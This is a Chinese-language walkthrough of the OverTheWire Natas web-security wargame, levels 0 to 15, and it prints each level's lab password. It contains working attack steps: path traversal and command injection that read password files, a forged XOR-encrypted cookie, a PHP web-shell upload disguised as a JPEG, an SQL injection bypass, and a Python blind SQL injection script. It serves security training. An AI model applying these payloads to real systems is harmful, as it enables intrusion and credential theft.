Wargame – Natas 0-15通关攻略

Level 0

URL:      http://natas0.natas.labs.overthewire.org

Username/password: natas0/natas0

查看注释

Level 1

Level 2

根据路径来到files目录

查看user.txt

Level 3

Google都找不到,说明针对爬虫做了设置,查看robots.txt文件

查看该路径,有个users.txt

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

将Referer修改为指定链接

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5

将loggedin修改为1

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

根据include路径访问secret.inc文件

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 7

路径包含漏洞

http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8

反向计算secret

hex2bin(3d3d516343746d4d6d6c315669563362) = “==QcCtmMml1ViV3b”

Strrev(==QcCtmMml1ViV3b) = “b3ViV1lmMmtCcQ==”

Base64_decode(b3ViV1lmMmtCcQ==) = “oubWYf2kBq”

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Level 9

Passthru执行外部指令,拼接命令执行漏洞

直接查看natas10密码 ; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10

过滤了一些字符,使用.* cat 命令查看

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Level 11

根据PHP和JS代码

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) &amp;&amp; array_key_exists("showpassword", $tempdata) &amp;&amp; array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}
function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
<h1>natas11</h1>
<div id="content">
<body style="background: <?=$data['bgcolor']?>;">
Cookies are protected with XOR encryption<br/><br/>

<?
if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>

需要找到值key,并且showpassword=yes

已经给出的data值为 showpassword=no & bgcolor=>#ffffff

Data值位于cookie中,此时cookie值为  

ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=

根据逆向此算法,求出key值

<?php
$origData = base64_decode(
    "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=");
$key = '{"showpassword":"no","bgcolor":"#ffffff"}';
$outText = "";
for ($i = 0; $i < strlen(origData); $i++) {
    $outText .= $origData[$i] ^ $key[$i % strlen($key)];
}
echo $outText;
?>

运行后得到qw8Jqw8J,则key = qw8J

则据此计算showpassword=yes时的cookie值

写出算法

<?php
function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}
echo base64_encode(xor_encrypt('{"showpassword":"yes","bgcolor":"#ffffff"}'));
?>

运行得到

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

浏览器console设置cookie值

EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Level 12

上传一个php文件,抓包,将jpg后缀修改为php

点击php链接,执行php代码获取密码

jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13

修改文件后缀不好用了

Winhex打开制作图片马,写入jpg文件头FFD8FFE0

抓包修改后缀为php,上传成功可以访问php路径

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 14

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

使用万能密码注入就可以 “ or “1”=”1

AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 15

存在sql的Boolean型盲注,利用搜索型注入like binary进行盲注爆破

import requests
import string

url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/"
characters = ''.join([string.ascii_letters, string.digits])
existsStr = 'This user exists.'
strs = ''

for i in characters:
    r = requests.get(url+'?username=natas16" AND password LIKE BINARY "%'+i+'%" "')
    if existsStr in r.content:
        strs += i
        print strs

#strs  = 'acehijmnpqtwBEHINORW03569'
password = ''
for i in range(32):
    for c in strs:
        r = requests.get(url + '?username=natas16" AND password LIKE BINARY "' +password+ c + '%" "')
        if existsStr in r.content:
            password += c
            print "Password: ",password
            break

直接用sqlmap进行boolean型盲注也可以得到natas16的密码

您可能还喜欢...